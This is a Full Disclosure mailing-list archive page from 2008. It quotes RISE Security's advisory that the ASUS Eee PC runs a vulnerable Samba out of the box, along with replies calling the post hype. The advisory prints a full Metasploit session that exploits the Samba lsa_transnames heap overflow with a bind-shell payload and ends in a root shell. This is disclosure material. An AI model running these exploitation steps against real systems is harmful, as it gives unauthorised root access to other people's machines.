Full Disclosure mailing list archives
Re: ASUS Eee PC rooted out of the box
From: reepex <reepex () gmail com>
Date: Fri, 8 Feb 2008 14:29:38 -0600
yes and no where in here includes 'make some media hyped report & blog crap for 5 minutes of fame' On Feb 8, 2008 2:27 PM, <keith () securitynow us> wrote:
Security research should go as follows, run some type of scanner to find known issues (low hanging fruit). Use your skill to manually try to find threats then manually create an exploit then report the issue after verified. -----Original Message----- From: reepex <reepex () gmail com> Sent: Friday, February 8, 2008 2:38pm To: RISE Security <advisories () risesecurity org>, full-disclosure () lists grok org uk Subject: Re: [Full-disclosure] ASUS Eee PC rooted out of the box _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/So you ran metasploit and then made a blog post. Is this what 'security research' is considered now? And why did you write this is such a media hyped way? Trying to get some spotlight? On Feb 8, 2008 10:47 AM, RISE Security <advisories () risesecurity org> wrote:-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 We recently acquired an ASUS Eee PC (if you want to know more about it, a lot of reviews are available on internet). The first thing we did when we put our hands at the ASUS Eee PC was to test its security. The ASUS Eee PC comes with a customized version of Xandros operating system installed, and some other bundled software like Mozilla Firefox, Pidgin, Skype and OpenOffice.org. Analysing the running processes of the ASUS Eee PC, the first thing that caught our attention was the running smbd process (the sshd daemon was started by us, and is not enabled by default). eeepc-rise:/root> ps -e PID TTY TIME CMD 1 ? 00:00:00 fastinit 2 ? 00:00:00 ksoftirqd/0 3 ? 00:00:00 events/0 4 ? 00:00:00 khelper 5 ? 00:00:00 kthread 25 ? 00:00:00 kblockd/0 26 ? 00:00:00 kacpid 128 ? 00:00:00 ata/0 129 ? 00:00:00 ata_aux 130 ? 00:00:00 kseriod 148 ? 00:00:00 pdflush 149 ? 00:00:00 pdflush 150 ? 00:00:00 kswapd0 151 ? 00:00:00 aio/0 152 ? 00:00:00 unionfs_siod/0 778 ? 00:00:00 scsi_eh_0 779 ? 00:00:00 scsi_eh_1 799 ? 00:00:00 kpsmoused 819 ? 00:00:00 kjournald 855 ? 00:00:00 fastinit 857 ? 00:00:00 sh 858 ? 00:00:00 su 859 tty3 00:00:00 getty 862 ? 00:00:00 startx 880 ? 00:00:00 xinit 881 tty2 00:00:06 Xorg 890 ? 00:00:00 udevd 952 ? 00:00:00 ksuspend_usbd 953 ? 00:00:00 khubd 1002 ? 00:00:00 acpid 1027 ? 00:00:00 pciehpd_event 1055 ? 00:00:00 ifplugd 1101 ? 00:00:00 scsi_eh_2 1102 ? 00:00:00 usb-storage 1151 ? 00:00:00 icewm 1185 ? 00:00:01 AsusLauncher 1186 ? 00:00:00 icewmtray 1188 ? 00:00:01 powermonitor 1190 ? 00:00:00 minimixer 1191 ? 00:00:00 networkmonitor 1192 ? 00:00:00 wapmonitor 1193 ? 00:00:00 x-session-manag 1195 ? 00:00:00 x-session-manag 1200 ? 00:00:00 x-session-manag 1201 ? 00:00:00 dispwatch 1217 ? 00:00:00 cupsd 1224 ? 00:00:00 usbstorageapple 1234 ? 00:00:00 kondemand/0 1240 ? 00:00:00 portmap 1248 ? 00:00:00 keyboardstatus 1272 ? 00:00:00 memd 1279 ? 00:00:00 scim-helper-man 1280 ? 00:00:00 scim-panel-gtk 1282 ? 00:00:00 scim-launcher 1297 ? 00:00:00 netserv 1331 ? 00:00:00 asusosd 1476 ? 00:00:00 xandrosncs-agen 1775 ? 00:00:00 dhclient3 2002 ? 00:00:00 nmbd 2004 ? 00:00:00 smbd 2005 ? 00:00:00 smbd 2322 ? 00:00:00 sshd 2345 ? 00:00:00 sshd 2356 pts/0 00:00:00 bash 2362 pts/0 00:00:00 ps eeepc-rise:/root> Retrieving the the smbd version, we discovered that it runs a vulnerable version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit we published earlier last year. eeepc-rise:/root> smbd --version Version 3.0.24 eeepc-rise:/root> With this information, we ran our exploit against the ASUS Eee PC using the Debian/Ubuntu target (Xandros is based on Corel Linux, which is Debian based). msf > use linux/samba/lsa_transnames_heap msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10 RHOST => 192.168.50.10 msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp PAYLOAD => linux/x86/shell_bind_tcp msf exploit(lsa_transnames_heap) > show targets Exploit targets: Id Name -- ---- 0 Linux vsyscall 1 Linux Heap Brute Force (Debian/Ubuntu) 2 Linux Heap Brute Force (Gentoo) 3 Linux Heap Brute Force (Mandriva) 4 Linux Heap Brute Force (RHEL/CentOS) 5 Linux Heap Brute Force (SUSE) 6 Linux Heap Brute Force (Slackware) 7 DEBUG msf exploit(lsa_transnames_heap) > set TARGET 1 TARGET => 1 msf exploit(lsa_transnames_heap) > exploit [*] Started bind handler [*] Creating nop sled.... ... [*] Trying to exploit Samba with address 0x08415000... [*] Connecting to the SMB service... [*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ... [*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ... [*] Calling the vulnerable function... [+] Server did not respond, this is expected [*] Command shell session 1 opened (192.168.50.201:33694 -> 192.168.50.10:4444) msf exploit(lsa_transnames_heap) > sessions -i 1 [*] Starting interaction with 1... uname -a Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686 GNU/Linux id uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup) Easy to learn, Easy to work, Easy to root. The original blog post and more information can be found in our website at http://risesecurity.org/. Best regards, RISE Security -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.6 (GNU/Linux) iD8DBQFHrIeHhFjK78TGSUERAvq7AJ9iz2sHD4/cQ0CdlCC1axNiVhwmJwCfddEd 6tg6XRBCWHfPWFrSdVKu5oA= =OFwe -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- ASUS Eee PC rooted out of the box RISE Security (Feb 08)
- Re: ASUS Eee PC rooted out of the box reepex (Feb 08)
- Re: ASUS Eee PC rooted out of the box Stack Smasher (Feb 08)
- Re: ASUS Eee PC rooted out of the box A . L . M . Buxey (Feb 08)
- Re: ASUS Eee PC rooted out of the box Stack Smasher (Feb 08)
- Re: ASUS Eee PC rooted out of the box reepex (Feb 08)
- Re: ASUS Eee PC rooted out of the box Tonu Samuel (Feb 14)
- Re: ASUS Eee PC rooted out of the box Stack Smasher (Feb 08)
- Re: ASUS Eee PC rooted out of the box reepex (Feb 08)
- Re: ASUS Eee PC rooted out of the box RISE Security (Feb 08)
- <Possible follow-ups>
- Re: ASUS Eee PC rooted out of the box Joey Mengele (Feb 08)
- Re: ASUS Eee PC rooted out of the box keith (Feb 08)
- Re: ASUS Eee PC rooted out of the box reepex (Feb 08)
- Re: ASUS Eee PC rooted out of the box Erik Harrison (Feb 08)
- Re: ASUS Eee PC rooted out of the box reepex (Feb 08)
- Re: ASUS Eee PC rooted out of the box Erik Harrison (Feb 08)
- Re: ASUS Eee PC rooted out of the box Simon Smith (Feb 08)
- Re: ASUS Eee PC rooted out of the box reepex (Feb 08)
- Re: ASUS Eee PC rooted out of the box Simon Smith (Feb 08)
- Re: ASUS Eee PC rooted out of the box reepex (Feb 08)
- Re: ASUS Eee PC rooted out of the box reepex (Feb 09)
- Re: ASUS Eee PC rooted out of the box Simon Smith (Feb 09)